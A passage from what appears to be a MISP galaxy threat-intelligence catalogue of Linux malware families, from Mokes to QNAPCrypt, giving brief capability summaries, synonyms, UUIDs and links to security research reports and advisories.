- https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/ - webarchive
- https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ - webarchive
- https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/ - webarchive
- https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093 - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://github.com/jgamblin/Mirai-Source-Code - webarchive
- https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/ - webarchive
- https://isc.sans.edu/diary/22786 - webarchive
- https://www.cadosecurity.com/technical-analysis-of-the-ddos-attacks-against-ukrainian-websites/ - webarchive
- https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/ - webarchive
- https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/ - webarchive
- https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability - webarchive
- https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html - webarchive
- https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/ - webarchive
- https://unit42.paloaltonetworks.com/cve-2020-17496/ - webarchive
- https://www.lacework.com/blog/malware-targeting-latest-f5-vulnerability/ - webarchive
- https://www.youtube.com/watch?v=KVJyYTie-Dc - webarchive
- https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ - webarchive
- https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ - webarchive
- https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ - webarchive
- https://deform.co/the-infamous-mirai-trojan-evolves-new-pandora-variant-targets-android-tvs/ - webarchive
- https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts - webarchive
- http://osint.bambenekconsulting.com/feeds/ - webarchive
- https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/ - webarchive
- https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ - webarchive
- https://www.cisecurity.org/insights/blog/top-10-malware-march-2022 - webarchive
- https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/ - webarchive
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai - webarchive
- https://blogs.jpcert.or.jp/en/2022/03/anti_upx_unpack.html - webarchive
- https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants - webarchive
- https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx - webarchive
- https://community.riskiq.com/article/d8a78daf - webarchive
- https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/ - webarchive
- http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ - webarchive
- https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/ - webarchive
- https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/ - webarchive
- https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet - webarchive
- https://twitter.com/MsftSecIntel/status/1535417776290111489 - webarchive
- https://cert.gov.ua/article/37139 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mokes (ELF)
Internal MISP references
UUID 6d5a5357-4126-4950-b8c3-ee78b1172217
which can be used as unique global reference for Mokes (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Momentum
Internal MISP references
UUID aaf8ce1b-3117-47c6-b756-809538ac8ff2
which can be used as unique global reference for Momentum
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Monti
Ransomware derived from the leaked Conti source code.
Internal MISP references
UUID 7df77b77-00dd-4eba-a697-b9a7be262acc
which can be used as unique global reference for Monti
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MooBot
Internal MISP references
UUID cd8deffe-eb0b-4451-8a13-11f6d291064a
which can be used as unique global reference for MooBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot - webarchive
- https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b - webarchive
- https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian - webarchive
- https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-RUSSIAN-ACTORS-USE-ROUTERS-FACILITATE-CYBER_OPERATIONS.PDF - webarchive
- https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ - webarchive
- https://blog.netlab.360.com/ddos-botnet-moobot-en/ - webarchive
- https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/ - webarchive
- https://www.fortinet.com/blog/threat-research/mirai-based-botnet-moobot-targets-hikvision-vulnerability - webarchive
- https://unit42.paloaltonetworks.com/moobot-d-link-devices/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Moose
Internal MISP references
UUID 7fdb91ea-52dc-499c-81f9-3dd824e2caa0
which can be used as unique global reference for Moose
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose - webarchive
- http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/ - webarchive
- http://www.welivesecurity.com/2015/05/26/moose-router-worm/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Paquet-Clouston.pdf - webarchive
- http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mozi
Mozi is an IoT botnet that uses P2P for communication and reuses source code of other well-known malware families, including Gafgyt, Mirai, and IoT Reaper.
Internal MISP references
UUID 236ba358-4c70-434c-a7ac-7a31e76c398a
which can be used as unique global reference for Mozi
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.mozi - webarchive
- https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/ - webarchive
- https://www.elastic.co/blog/collecting-and-operationalizing-threat-data-from-the-mozi-botnet - webarchive
- https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/ - webarchive
- https://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave - webarchive
- https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/ - webarchive
- https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/ - webarchive
- https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/ - webarchive
- https://blog.netlab.360.com/mozi-another-botnet-using-dht/ - webarchive
- https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/ - webarchive
- https://www.nozominetworks.com/blog/overcoming-the-challenges-of-detecting-p2p-botnets-on-your-network/ - webarchive
- https://www.youtube.com/watch?v=cDFO_MRlg3M - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf - webarchive
- https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MrBlack
MrBlack, first identified in May 2014 by Russian security firm Dr. Web, is a botnet that targets Linux OS and is designed to conduct distributed denial-of-service (DDoS) attacks. In May 2015, Incapsula clients suffered a large-scale DDoS attack which the company attributed to network traffic generated by tens of thousands of small office/home office (SOHO) routers infected with MrBlack. This massive botnet spans over 109 countries, especially in Thailand and Brazil.
MrBlack scans for and infects routers that have not had their default login credentials changed and that allow remote access to HTTP and SSH via port 80 and port 22, respectively. One of the most impacted router brands is Ubiquiti, a U.S.-based firm that provides bulk network hub solutions for internet service providers to lease to their customers. Once a vulnerable router is compromised and MrBlack is injected into the system, a remote server is contacted and system information from the device is transmitted. This allows the host server to receive commands in order to perform different types of DDoS attacks, download and execute files, and terminate processes.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MrBlack.
Known Synonyms |
---|
AESDDoS |
Dofloo |
Internal MISP references
UUID fc047e32-9cf2-4a92-861a-be882efd8a50
which can be used as unique global reference for MrBlack
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack - webarchive
- https://news.drweb.com/?i=5760&c=23&lng=en - webarchive
- https://www.bleepingcomputer.com/news/security/exposed-docker-apis-abused-by-ddos-cryptojacking-botnet-malware/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf - webarchive
- https://blog.syscall.party/post/aes-ddos-analysis-part-1/ - webarchive
- https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mumblehard
Internal MISP references
UUID 5f78127b-25d3-4f86-8a64-f9549b2db752
which can be used as unique global reference for Mumblehard
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nextcry
Ransomware used against Linux servers.
Internal MISP references
UUID 7ec8a41f-c72e-4832-a5a4-9d7380cea083
which can be used as unique global reference for Nextcry
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ngioweb (ELF)
Internal MISP references
UUID a4ad242c-6fd0-4b1d-8d97-8f48150bf242
which can be used as unique global reference for Ngioweb (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.ngioweb - webarchive
- https://blog.netlab.360.com/an-analysis-of-linux-ngioweb-botnet-en/ - webarchive
- https://blog.netlab.360.com/linux-ngioweb-v2-going-after-iot-devices-en/ - webarchive
- https://twitter.com/IntezerLabs/status/1324346324683206657 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nimbo-C2 (ELF)
According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 and Linux. It's written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).
Internal MISP references
UUID 5dbdf2ea-a15b-4ad6-bf7a-a030998c66b4
which can be used as unique global reference for Nimbo-C2 (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NiuB
Golang-based RAT that offers execution of shell commands and a download-and-run capability.
Internal MISP references
UUID 7c516b66-f4a4-406a-bf35-d898ac8bffec
which can be used as unique global reference for NiuB
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NoaBot
Internal MISP references
UUID b5ee45a0-d75b-40e7-b737-3cfa1cc8246c
which can be used as unique global reference for NoaBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nood RAT
Internal MISP references
UUID 59ac87c0-f2ce-4e83-83bd-299e123b72a7
which can be used as unique global reference for Nood RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nosedive
According to Black Lotus Labs, Nosedive is a custom variation of the Mirai implant that is supported on all major SOHO and IoT architectures (e.g. MIPS, ARM, SuperH, PowerPC, etc.). Nosedive implants are typically deployed from Tier 2 payload servers in the Raptor Train infrastructure through a unique URL encoding scheme and domain injection method. Nosedive droppers use this method to request payloads for specific C2s by encoding the requested C2 domain and joining it with a unique "key" that identifies the bot and the target architecture of the compromised device (e.g. MIPS, ARM, etc.), which is then injected into the Nosedive implant payload that is deployed to the Tier 1 node. Once deployed, Nosedive runs in-memory only and allows the operators to execute commands, upload and download files, and run DDoS attacks on compromised devices.
The malware and its associated droppers are memory-resident only and deleted from disk. This, in addition to anti-forensics techniques employed on these devices including the obfuscation of running process names, compromising devices through a multi-stage infection chain, and killing remote management processes, makes detection and forensics much more difficult.
Internal MISP references
UUID 13840bb0-494d-403e-a37d-65cf144d71e9
which can be used as unique global reference for Nosedive
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.nosedive - webarchive
- https://assets.lumen.com/is/content/Lumen/raptor-train-handbook-copy - webarchive
- https://media.defense.gov/2024/Sep/18/2003547016/-1/-1/0/CSA-PRC-LINKED-ACTORS-BOTNET.PDF - webarchive
- https://blog.lumen.com/derailing-the-raptor-train/ - webarchive
- https://www.justice.gov/d9/2024-09/redacted_24-mj-1484_signed_search_and_seizure_warrant_for_disclosure.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NOTROBIN
FireEye states that NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NOTROBIN.
Known Synonyms |
---|
remove_bds |
Internal MISP references
UUID aaeb76b3-3885-4dc6-9501-4504fed9f20b
which can be used as unique global reference for NOTROBIN
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.notrobin - webarchive
- https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/ - webarchive
- https://news.sophos.com/en-us/2020/05/21/asnarok2/ - webarchive
- https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/ - webarchive
- https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html - webarchive
- https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/ - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OrBit
According to Stormshield, OrBit is a two-stage malware that appeared in July 2022 and was discovered by Intezer Labs. Acting as a stealer and backdoor on 64-bit Linux systems, it consists of an executable acting as a dropper and a dynamic library.
Internal MISP references
UUID ae9d84f2-60e5-4a33-98f4-a0061938ec6d
which can be used as unique global reference for OrBit
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Owari
Mirai variant by actor "Anarchy" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices.
Internal MISP references
UUID ec67f206-6464-48cf-a012-3cdfc1278488
which can be used as unique global reference for Owari
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari - webarchive
- https://twitter.com/hrbrmstr/status/1019922651203227653 - webarchive
- https://twitter.com/360Netlab/status/1019759516789821441 - webarchive
- https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863 - webarchive
- https://twitter.com/ankit_anubhav/status/1019647993547550720 - webarchive
- https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/ - webarchive
- https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/ - webarchive
- https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
p0sT5n1F3r
According to Yarix Digital Security, this is malware that sniffs HTTPS traffic, implemented as an Apache module.
Internal MISP references
UUID cc48c6ae-d274-4ad0-b013-bd75041a20c8
which can be used as unique global reference for p0sT5n1F3r
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
P2Pinfect
P2Pinfect is a fast-growing multi-platform botnet whose purpose is still unknown. Written in Rust, it is compatible with Windows and Linux, including a MIPS variant for Linux-based routers and IoT devices. It is capable of brute-forcing SSH logins and exploiting Redis servers in order to propagate itself both to random IPs on the internet and to hosts it can find references to in files present on the infected system.
Internal MISP references
UUID 31a32308-7034-4419-b1f3-56a4d64b4358
which can be used as unique global reference for P2Pinfect
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.p2pinfect - webarchive
- https://www.cadosecurity.com/p2pinfect-new-variant-targets-mips-devices/ - webarchive
- https://www.cadosecurity.com/blog/from-dormant-to-dangerous-p2pinfect-evolves-to-deploy-new-ransomware-and-cryptominer - webarchive
- https://www.cadosecurity.com/redis-p2pinfect/ - webarchive
- https://www.cadosecurity.com/cado-security-labs-researchers-witness-a-600x-increase-in-p2pinfect-traffic/ - webarchive
- https://unit42.paloaltonetworks.com/peer-to-peer-worm-p2pinfect/ - webarchive
- https://www.nozominetworks.com/blog/p2pinfect-worm-evolves-to-target-a-new-platform - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
pbot
P2P botnet derived from the Mirai source code.
Internal MISP references
UUID 7aff049d-9326-466d-bbcc-d62da673b32c
which can be used as unique global reference for pbot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Penquin Turla
Internal MISP references
UUID 262e0cf2-2fed-4d37-8d7a-0fd62c712840
which can be used as unique global reference for Penquin Turla
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla - webarchive
- https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180251/Penquins_Moonlit_Maze_PDF_eng.pdf - webarchive
- https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf - webarchive
- https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf - webarchive
- https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf - webarchive
- https://lab52.io/blog/looking-for-penquins-in-the-wild/ - webarchive
- https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf - webarchive
- https://securelist.com/big-threats-using-code-similarity-part-1/97239/ - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf - webarchive
- https://twitter.com/juanandres_gs/status/944741575837528064 - webarchive
- https://www.youtube.com/watch?v=JXsjRUxx47E - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
perfctl
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular perfctl.
Known Synonyms |
---|
perfcc |
Internal MISP references
UUID 5a4408f2-6ee3-4c82-9ee2-a1b4290666be
which can be used as unique global reference for perfctl
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.perfctl - webarchive
- https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/ - webarchive
- https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PerlBot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PerlBot.
Known Synonyms |
---|
DDoS Perl IrcBot |
ShellBot |
Internal MISP references
UUID 24b77c9b-7e7e-4192-8161-b6727728170f
which can be used as unique global reference for PerlBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot - webarchive
- https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html - webarchive
- https://sysdig.com/blog/malware-analysis-shellbot-sysdig/ - webarchive
- https://therecord.media/agents-raid-home-of-kansas-man-seeking-info-on-botnet-that-infected-dod-network/ - webarchive
- https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/ - webarchive
- https://jask.com/wp-content/uploads/2019/02/Shellbot-Campaign_v2.pdf - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://twitter.com/Nocturnus/status/1308430959512092673 - webarchive
- https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ - webarchive
- https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf - webarchive
- https://brianstadnicki.github.io/posts/malware-gitlab-perlbot/ - webarchive
- https://unit42.paloaltonetworks.com/cve-2020-17496/ - webarchive
- https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/ - webarchive
- https://asec.ahnlab.com/en/49769/ - webarchive
- https://asec.ahnlab.com/en/54647/ - webarchive
- https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Persirai
Internal MISP references
UUID 2ee05352-3d4a-448b-825d-9d6c10792bf7
which can be used as unique global reference for Persirai
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PG_MEM
Internal MISP references
UUID 74ffa404-9082-4db9-ac19-18a875db9fe7
which can be used as unique global reference for PG_MEM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PigmyGoat
Internal MISP references
UUID fcdcdc68-4c82-4d3d-aef1-96eac0a62761
which can be used as unique global reference for PigmyGoat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PingPull
Internal MISP references
UUID 65a7944c-15d9-4ca5-8561-7c97b18684c8
which can be used as unique global reference for PingPull
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pink
A botnet with P2P and centralized C&C capabilities.
Internal MISP references
UUID 67063764-a47c-4058-9cb2-1685ffa14fe8
which can be used as unique global reference for Pink
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PLEAD (ELF)
Internal MISP references
UUID de3c14aa-f9f4-4071-8e6e-a2c16a3394ad
which can be used as unique global reference for PLEAD (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.plead - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape - webarchive
- https://cyberandramen.net/2021/02/11/blacktech-updates-elf-plead-backdoor/ - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf - webarchive
- https://blogs.jpcert.or.jp/en/2020/11/elf-plead.html - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://jp.security.ntt/resources/EN-BlackTech_2021.pdf - webarchive
- https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Poseidon (ELF)
Part of Mythic C2, written in Golang.
Internal MISP references
UUID ad796632-2595-4ae5-a563-b92197210d61
which can be used as unique global reference for Poseidon (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.poseidon - webarchive
- https://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/ - webarchive
- https://github.com/MythicAgents/poseidon - webarchive
- https://brandefense.io/blog/apt-36-campaign-poseidon-malware-technical-analysis/ - webarchive
- https://cert.gov.ua/article/6123309 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PRISM
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PRISM.
Known Synonyms |
---|
waterdrop |
Internal MISP references
UUID 9a4a866b-84a9-4778-8de8-2780a27c0597
which can be used as unique global reference for PRISM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PrivetSanya
Black Lotus Labs identified malware for the Windows Subsystem for Linux (WSL). Mostly written in Python but compiled as Linux ELF files.
Internal MISP references
UUID 41e5aafb-5847-421e-813d-627414ee31bb
which can be used as unique global reference for PrivetSanya
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Prometei (ELF)
Internal MISP references
UUID b6899bda-54e9-4953-8af5-22af39776b69
which can be used as unique global reference for Prometei (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei - webarchive
- https://twitter.com/IntezerLabs/status/1338480158249013250 - webarchive
- https://cujo.com/iot-malware-journals-prometei-linux/ - webarchive
- https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html - webarchive
- https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pro-Ocean
Unit 42 describes this as a malware used by Rocke Group that deploys an XMRig miner.
Internal MISP references
UUID aa918c10-e5c7-4abd-b8c0-3c938a6675f5
which can be used as unique global reference for Pro-Ocean
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.pro_ocean - webarchive
- https://seguranca-informatica.pt/new-cryptojacking-malware-called-pro-ocean-is-now-attacking-apache-oracle-and-redis-servers/ - webarchive
- https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
pupy (ELF)
Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.
Internal MISP references
UUID 92a1288f-cc4d-47ca-8399-25fe5a39cf2d
which can be used as unique global reference for pupy (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Qilin
Internal MISP references
UUID d97af6c5-640f-46b4-943c-0e8940f8011e
which can be used as unique global reference for Qilin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QNAPCrypt
The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:
- The ransom note was included solely as a text file, without any message on the screen—naturally, because it is a server and not an endpoint.
- Every victim is provided with a different, unique Bitcoin wallet—this could help the attackers avoid being traced.
- Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QNAPCrypt.
Known Synonyms |
---|
eCh0raix |
Internal MISP references
UUID a0b12e5f-0257-41f1-beda-001ad944c4ca
which can be used as unique global reference for QNAPCrypt
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/ - webarchive
- https://www.intezer.com/blog-seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers/ - webarchive
- https://www.qnap.com/en/security-advisory/QSA-20-02 - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/ - webarchive
- https://www.ibm.com/downloads/cas/Z81AVOY7 - webarchive
- https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt - webarchive
- https://blog.netlab.360.com/qnap-nas-users-make-sure-you-check-your-system/ - webarchive
- https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf - webarchive
- https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/ - webarchive
